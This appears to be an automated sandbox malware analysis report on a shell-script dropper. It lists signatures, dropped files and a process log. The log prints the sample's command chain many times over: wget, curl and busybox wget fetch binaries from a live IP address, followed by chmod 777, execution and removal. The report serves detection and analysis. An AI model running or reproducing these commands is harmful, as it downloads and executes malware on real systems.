Malware Analysis Report

2025-06-15 23:10

Sample ID 241018-b8zhhazame
Target 5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh
SHA256 5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19

Threat Level: Shows suspicious behavior

The file 5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-18 01:49

Signatures

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-18 01:49

Reported

2024-10-18 01:52

Platform

debian9-mipsbe-20240418-en

Max time kernel

90s

Max time network

92s

Command Line

[/tmp/5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq N/A
N/A /tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 /tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 N/A
N/A /tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K /tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K N/A
N/A /tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg /tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg N/A
N/A /tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 /tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 N/A
N/A /tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z /tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z N/A
N/A /tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq /tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq N/A
N/A /tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 /tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 N/A
N/A /tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV /tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV N/A
N/A /tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL /tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL N/A
N/A /tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 /tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 N/A
N/A /tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD /tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD N/A
N/A /tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA /tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA N/A
N/A /tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW /tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW N/A
N/A /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq N/A
N/A /tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z /tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z N/A
N/A /tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 /tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 N/A
N/A /tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K /tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K N/A
N/A /tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg /tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg N/A
N/A /tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 /tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 N/A
N/A /tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV /tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV N/A
N/A /tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq /tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq N/A
N/A /tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 /tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 N/A
N/A /tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW /tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW N/A
N/A /tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL /tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL N/A
N/A /tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 /tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 N/A
N/A /tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD /tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD N/A
N/A /tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA /tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq /usr/bin/curl N/A
File opened for modification /tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K /usr/bin/curl N/A
File opened for modification /tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 /usr/bin/curl N/A
File opened for modification /tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 /usr/bin/curl N/A
File opened for modification /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq /usr/bin/curl N/A
File opened for modification /tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 /usr/bin/curl N/A
File opened for modification /tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 /usr/bin/curl N/A
File opened for modification /tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq /usr/bin/curl N/A
File opened for modification /tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW /usr/bin/curl N/A
File opened for modification /tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z /usr/bin/curl N/A
File opened for modification /tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg /usr/bin/curl N/A
File opened for modification /tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV /usr/bin/curl N/A
File opened for modification /tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 /usr/bin/curl N/A
File opened for modification /tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL /usr/bin/curl N/A
File opened for modification /tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD /usr/bin/curl N/A
File opened for modification /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq /usr/bin/curl N/A
File opened for modification /tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K /usr/bin/curl N/A
File opened for modification /tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg /usr/bin/curl N/A
File opened for modification /tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW /usr/bin/curl N/A
File opened for modification /tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD /usr/bin/curl N/A
File opened for modification /tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 /usr/bin/curl N/A
File opened for modification /tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 /usr/bin/curl N/A
File opened for modification /tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL /usr/bin/curl N/A
File opened for modification /tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 /usr/bin/curl N/A
File opened for modification /tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA /usr/bin/curl N/A
File opened for modification /tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z /usr/bin/curl N/A
File opened for modification /tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV /usr/bin/curl N/A
File opened for modification /tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA /usr/bin/curl N/A

Processes

/tmp/5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh

[/tmp/5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq]

/bin/chmod

[chmod 777 oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq]

/tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq

[./oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq]

/bin/rm

[rm oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq]

/usr/bin/wget

[wget http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5]

/bin/chmod

[chmod 777 TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5]

/tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5

[./TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5]

/bin/rm

[rm TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5]

/usr/bin/wget

[wget http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K]

/bin/chmod

[chmod 777 yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K]

/tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K

[./yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K]

/bin/rm

[rm yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K]

/usr/bin/wget

[wget http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg]

/bin/chmod

[chmod 777 l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg]

/tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg

[./l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg]

/bin/rm

[rm l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg]

/usr/bin/wget

[wget http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9]

/bin/chmod

[chmod 777 CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9]

/tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9

[./CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9]

/bin/rm

[rm CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9]

/usr/bin/wget

[wget http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z]

/bin/chmod

[chmod 777 ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z]

/tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z

[./ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z]

/bin/rm

[rm ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z]

/usr/bin/wget

[wget http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq]

/bin/chmod

[chmod 777 pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq]

/tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq

[./pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq]

/bin/rm

[rm pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq]

/usr/bin/wget

[wget http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4]

/bin/chmod

[chmod 777 X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4]

/tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4

[./X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4]

/bin/rm

[rm X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4]

/usr/bin/wget

[wget http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV]

/bin/chmod

[chmod 777 wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV]

/tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV

[./wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV]

/bin/rm

[rm wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV]

/usr/bin/wget

[wget http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL]

/bin/chmod

[chmod 777 vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL]

/tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL

[./vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL]

/bin/rm

[rm vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL]

/usr/bin/wget

[wget http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0]

/bin/chmod

[chmod 777 ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0]

/tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0

[./ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0]

/bin/rm

[rm ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0]

/usr/bin/wget

[wget http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD]

/bin/chmod

[chmod 777 suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD]

/tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD

[./suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD]

/bin/rm

[rm suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD]

/usr/bin/wget

[wget http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA]

/bin/chmod

[chmod 777 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA]

/tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA

[./3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA]

/bin/rm

[rm 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA]

/usr/bin/wget

[wget http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW]

/bin/chmod

[chmod 777 CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW]

/tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW

[./CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW]

/bin/rm

[rm CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW]

/usr/bin/wget

[wget http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq]

/bin/chmod

[chmod 777 oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq]

/tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq

[./oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq]

/bin/rm

[rm oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq]

/usr/bin/wget

[wget http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z]

/bin/chmod

[chmod 777 ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z]

/tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z

[./ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z]

/bin/rm

[rm ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z]

/usr/bin/wget

[wget http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5]

/bin/chmod

[chmod 777 TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5]

/tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5

[./TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5]

/bin/rm

[rm TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5]

/usr/bin/wget

[wget http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K]

/bin/chmod

[chmod 777 yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K]

/tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K

[./yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K]

/bin/rm

[rm yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K]

/usr/bin/wget

[wget http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg]

/bin/chmod

[chmod 777 l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg]

/tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg

[./l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg]

/bin/rm

[rm l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg]

/usr/bin/wget

[wget http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9]

/bin/chmod

[chmod 777 CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9]

/tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9

[./CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9]

/bin/rm

[rm CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9]

/usr/bin/wget

[wget http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV]

/bin/chmod

[chmod 777 wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV]

/tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV

[./wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV]

/bin/rm

[rm wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV]

/usr/bin/wget

[wget http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq]

/bin/chmod

[chmod 777 pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq]

/tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq

[./pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq]

/bin/rm

[rm pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq]

/usr/bin/wget

[wget http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4]

/bin/chmod

[chmod 777 X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4]

/tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4

[./X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4]

/bin/rm

[rm X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4]

/usr/bin/wget

[wget http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW]

/bin/chmod

[chmod 777 CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW]

/tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW

[./CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW]

